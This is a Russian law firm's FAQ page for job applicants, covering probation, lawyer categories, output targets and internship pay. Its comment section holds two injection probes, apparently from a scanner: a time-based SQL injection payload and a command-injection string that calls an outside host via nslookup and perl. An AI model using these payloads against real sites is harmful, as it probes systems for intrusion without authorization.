г. Москва, ул. Щепкина, 28
+7 (495) 540-53-43
mail@ulc.ru

Вопросы и ответы соискателям по вакансиям

Работа для юристов

Вопросы и ответы соискателям по вакансиям

1. Сколько в Вашей организации длится испытательный срок?

В трудовом договоре (ТД Юриста) прописано п.1.3. «Юрист в течение месяца проходит испытание при приеме на работу». Имеется 3 выхода из испытания при приеме на работу, раньше – при условии, что Вы будете готовы продемонстрировать результаты испытания аттестационной комиссии, в срок – по окончании 1 месяца, а также позже. По трудовому законодательству испытательный срок может быть до 6 месяцев, соответственно, аттестационная комиссия может продлить время испытания при приеме на работу по результатам аттестации.

 

2. Аттестация после испытательного срока проводится по выбранной юристом специализации или по всем отраслям права? Тот же вопрос касается квартальной аттестации.

Аттестация после испытательного срока проводится по выбранной юристом специализации.

 

3. Вновь принятым работникам изначально присваивается младшая 7-я категория или категория зависит от квалификации и опыта работы кандидата? У юристов всего 7 категорий?

В нашей компании у юристов 8 категорий: юрист без категории и юристы 1-7 категории. При аттестации Вы сами заявляете какую хотите иметь категорию, по результатам испытания комиссия ее Вам присваивает.

 

4. Расскажите, пожалуйста, подробнее в каких случаях необходимо создавать временный трудовой коллектив при условии, что я могу совмещать функции специалиста по регистрации / специалиста по лицензированию / специалиста по ликвидации?

Необходимость создания временного трудового коллектива определяется ведущим юристом.

 

5. «Время, не занятое исполнением трудовых обязанностей, не учитывается как рабочее», имеется ввиду халатное отношение работника к выполнению должностных обязанностей?

Халатное отношение работника – это низкокачественное, «время не занятое исполнением трудовых обязанностей, не учитывается как рабочее» означает то время, которое было потрачено на что-то иное, не связанное с работой.

 

6. Если юрист взял в работу заявку клиента, он становится ведущим. Если, например, в Вашей компании несколько специалистов по регистрации, каким образом отделение будет распределять между ними заказы при равной производительности труда и квалификации?

При распределении заказов между юристами учитывается несколько пунктов: 1. Ваша специализация, 2. Ваше нахождение на рабочем месте, 3. Ваша занятость. Тот юрист, который принимает заказ, необязательно выполняет его, он может передать его другому юристу, например, в случае большой загруженности.

 

7. «Месячная выработка устанавливается в размере 120 000 рублей для юриста без категории». В каком размере устанавливается выработка для юриста с категорией и какая градация? Пункт 4.23. распространяется на период испытательного срока?

Месячная выработка устанавливается для всех юристов 120 000 рублей.

 

8. В основном на каких сторонних сайтах размещаются тематические статьи?

Тематические статьи размещены в основном на нашем сайте, а также в наших соц. сетях.

 

9. Установление на испытательном сроке оклада ниже, чем предполагается, не допускается трудовым законодательством Российской Федерации. Меня не устраивает работать месяц за 20 тысяч рублей.

Почему Вы говорите только об окладе? Вы ведь планируете производить какие-то юридические решения и действия? Тогда заработная плата будет иной. Заработная плата состоит из оклада, надбавок и премий. С чего Вы взяли, что Вы будете работать в месяц за 20 000 р.?

«Установление на испытательном сроке оклада ниже, чем предполагается, не допускается трудовым законодательством Российской Федерации» — предполагается где? В настоящее время в городе Москве действует величина прожиточного минимума, утвержденная постановлением Правительства Москвы от 17 июня № 807-ПП «Об установлении величины прожиточного минимума в городе Москве за I квартал 2020 г.»: для трудоспособного населения — 19 544 рублей.

Трудовое законодательство и наш трудовой договор предполагают, что испытание закончится, как только Вы продемонстрируете Ваши знания. Вы можете завершить испытание на первой неделе.

 

10. Сколько длится стажировка? Оплачивается она или нет?

Дистанционная стажировка длится 2 рабочих дня с 9.00 до 18.00, но может закончиться раньше, при условии, что Вы справитесь с выполнением заданий раньше указанного времени и не оплачивается.

В п. 1.4 трудового договора сказан, «Юрист в течение первых 2 рабочих дней проходит стажировку, представляющую собой ученичество для индивидуального получения знаний, необходимых для работы в информационной среде и по стандартам Отделения. По завершению стажировки аттестационная комиссия оценивает её результаты. При отрицательных результатах Отделение имеет право расторгнуть Договор.»

В п. 2.6 трудового договора сказано, «Отделение выплачивает за период стажировки, при её успешном завершении, стипендию в размере 100 рублей за каждый полный учебный день с 9:00 до 18:00.»

Период прохождения дистанционной стажировки и стажировки в офисе зависит от времени и качества выполненных Вами заданий.

4 комментария

  1. if(now()=sysdate(),sleep(15),0)

  2. &(nslookup hitkamvcrctjr93eba.bxss.me||perl -e «gethostbyname(‘hitkamvcrctjr93eba.bxss.me’)»)&’\»`0&(nslookup hitkamvcrctjr93eba.bxss.me||perl -e «gethostbyname(‘hitkamvcrctjr93eba.bxss.me’)»)&`’

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *